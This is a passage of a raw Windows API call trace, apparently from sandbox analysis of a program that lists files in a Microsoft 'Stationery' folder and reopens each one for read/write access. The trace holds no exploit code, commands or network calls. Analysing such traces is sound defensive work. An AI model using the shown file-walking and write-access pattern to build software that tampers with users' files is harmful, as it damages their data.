Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.111] AreFileApisANSI () returned 1 [0102.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm", lpUsedDefaultChar=0x0) returned 68 [0102.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0102.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.111] AreFileApisANSI () returned 1 [0102.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 68 [0102.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.112] GetFileType (hFile=0x368) returned 0x1 [0102.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0102.112] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.112] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.113] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.113] CloseHandle (hObject=0x368) returned 1 [0102.113] AreFileApisANSI () returned 1 [0102.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 68 [0102.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.113] GetLastError () returned 0x5 [0102.113] GetLastError () returned 0x5 [0102.113] SetLastError (dwErrCode=0x5) [0102.113] GetLastError () returned 0x5 [0102.113] SetLastError (dwErrCode=0x5) [0102.113] GetLastError () returned 0x5 [0102.114] SetLastError (dwErrCode=0x5) [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0102.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.114] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0102.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.115] AreFileApisANSI () returned 1 [0102.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", lpUsedDefaultChar=0x0) returned 68 [0102.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0102.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.115] AreFileApisANSI () returned 1 [0102.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0102.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 68 [0102.115] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.116] GetFileType (hFile=0x368) returned 0x1 [0102.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0102.116] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.116] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.116] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.117] CloseHandle (hObject=0x368) returned 1 [0102.117] AreFileApisANSI () returned 1 [0102.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82c28 [0102.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 68 [0102.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.117] GetLastError () returned 0x5 [0102.117] GetLastError () returned 0x5 [0102.117] SetLastError (dwErrCode=0x5) [0102.117] GetLastError () returned 0x5 [0102.117] SetLastError (dwErrCode=0x5) [0102.117] GetLastError () returned 0x5 [0102.117] SetLastError (dwErrCode=0x5) [0102.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0102.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0102.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.117] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a3ecc0a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d2da05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d2da05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0102.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0102.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.118] AreFileApisANSI () returned 1 [0102.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", lpUsedDefaultChar=0x0) returned 70 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0102.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.119] AreFileApisANSI () returned 1 [0102.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a6f8 [0102.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0102.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.120] GetFileType (hFile=0x368) returned 0x1 [0102.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.120] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.120] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.120] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.120] CloseHandle (hObject=0x368) returned 1 [0102.120] AreFileApisANSI () returned 1 [0102.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ab20 [0102.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0102.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.121] GetFileType (hFile=0x368) returned 0x1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.121] CloseHandle (hObject=0x368) returned 1 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 